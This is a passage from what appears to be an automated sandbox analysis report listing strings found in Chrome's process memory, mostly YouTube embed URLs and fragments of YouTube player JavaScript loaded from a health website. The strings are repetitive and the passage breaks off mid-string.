                                  Source: chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507031147.000028EC07D2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477065852.000028EC02EE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comh.ca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comh.capagepfabeoofebfddakdcjhd) anonymous] equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https_www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2502516412.000028EC06DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497527553.000028EC04D50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https_www.youtube.com_0@1YtIdbMeta equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https_www.youtube.com_0@1 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}EB equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: if(!(f||g||h||m.length||n.length))return;var q={Yi:f,Wi:g,Xi:h,Gj:m,Hj:n,Pf:p,bc:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(RI(x,"iframe_api")||RI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,D=0;D<C;D++)if(!II&&PI(z[D],q.Pf))return vc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(":",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,"error","ad"))&&m.eval(A.createScript("1"))===1?function(g){return A.createScript(g)}:function(g){return""+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w
                                  Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2402229430.000028EC04D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kFnZW50RGF0YSYmdy5uYXZpZ2F0b3IudXNlckFnZW50RGF0YS5icmFuZHMmJncubmF2aWdhdG9yLnVzZXJBZ2VudERhdGEuYnJhbmRzLmxlbmd0aCl7dmFyIGJyYW5kcz13Lm5hdmlnYXRvci51c2VyQWdlbnREYXRhLmJyYW5kczt2YXIgaT0wO2Zvcig7aTxicmFuZHMubGVuZ3RoO2krKylpZihicmFuZHNbaV0mJmJyYW5kc1tpXS5icmFuZD09PSJGaXJlZm94IilyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2V9fWNhdGNoKGUpe3NldFRpbWVvdXQoZnVuY3Rpb24oKXt0aHJvdyBlO30pfWlmKCF3Lm5hdmlnYXRvci51c2VyQWdlbnQpcmV0dXJuIGZhbHNlO3ZhciB1YT13Lm5hdmlnYXRvci51c2VyQWdlbnQ7cmV0dXJuIHVhLmluZGV4T2YoIkdlY2tvIik+MCYmdWEudG9Mb3dlckNhc2UoKS5pbmRleE9mKCJ3ZWJraXQiKTwwJiZ1YS5pbmRleE9mKCJFZGdlIik8CjAmJnVhLmluZGV4T2YoIlRyaWRlbnQiKTwwJiZ1YS5pbmRleE9mKCJNU0lFIik8MH15dGNzaS5zZXRTdGFydCh3LnBlcmZvcm1hbmNlP3cucGVyZm9ybWFuY2UudGltaW5nLnJlc3BvbnNlU3RhcnQ6bnVsbCk7dmFyIGlzUHJlcmVuZGVyPShkLnZpc2liaWxpdHlTdGF0ZXx8ZC53ZWJraXRWaXNpYmlsaXR5U3RhdGUpPT0icHJlcmVuZGVyIjt2YXIgdk5hbWU9IWQudmlzaWJpbGl0eVN0YXRlJiZkLndlYmtpdFZpc2liaWxpdHlTdGF0ZT8id2Via2l0dmlzaWJpbGl0eWNoYW5nZSI6InZpc2liaWxpdHljaGFuZ2UiO2lmKGlzUHJlcmVuZGVyKXt2YXIgc3RhcnRUaWNrPWZ1bmN0aW9uKCl7eXRjc2kuc2V0U3RhcnQoKTtkLnJlbW92ZUV2ZW50TGlzdGVuZXIodk5hbWUsc3RhcnRUaWNrKX07ZC5hZGRFdmVudExpc3RlbmVyKHZOYW1lLHN0YXJ0VGljayxmYWxzZSl9aWYoZC5hZGRFdmVudExpc3RlbmVyKWQuYWRkRXZlbnRMaXN0ZW5lcih2TmFtZSxmdW5jdGlvbigpe3l0Y3NpLnRpY2soInZjIil9LApmYWxzZSk7aWYoaXNHZWNrbygpKXt2YXIgaXNIaWRkZW49KGQudmlzaWJpbGl0eVN0YXRlfHxkLndlYmtpdFZpc2liaWxpdHlTdGF0ZSk9PSJoaWRkZW4iO2lmKGlzSGlkZGVuKXl0Y3NpLnRpY2soInZjIil9dmFyIHNsdD1mdW5jdGlvbihlbCx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG49eXRjc2kubm93KCk7ZWwubG9hZFRpbWU9bjtpZihlbC5zbHQpZWwuc2x0KCl9LHQpfTt3Ll9feXRSSUw9ZnVuY3Rpb24oZWwpe2lmKCFlbC5nZXRBdHRyaWJ1dGUoImRhdGEtdGh1bWIiKSlpZih3LnJlcXVlc3RBbmltYXRpb25GcmFtZSl3LnJlcXVlc3RBbmltYXRpb25GcmFtZShmdW5jdGlvbigpe3NsdChlbCwwKX0pO2Vsc2Ugc2x0KGVsLDE2KX19KSh3aW5kb3csZG9jdW1lbnQpOwo=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: kejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.js0(-2517715832659448638.6270065637815208423differentDocumentE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRrupalSettings = JSON.parse(settingsElement.textContent); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: l.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: lRpbWVNczogIDQzLjAgfSwgJycpO30=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: n(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: new Set;this.deviceIsAudioOnly=!(z==null||!z.deviceIsAudioOnly);this.II=YK(this.II,B.ismb);this.EM?(F=B.vss_host||"s.youtube.com",F==="s.youtube.com"&&(F=mR(this.yW)||"www.youtube.com")):F="video.google.com";this.Lt=F;nY(this,B,!0);this.lO=new Wo;g.m(this,this.lO);r=z?z.innertubeApiKey:l9("",B.innertube_api_key);C=z?z.innertubeApiVersion:l9("",B.innertube_api_version);F=z?z.innertubeContextClientVersion:l9("",B.innertube_context_client_version);r=g.ek("INNERTUBE_API_KEY")||r;C=g.ek("INNERTUBE_API_VERSION")|| equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: onts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAE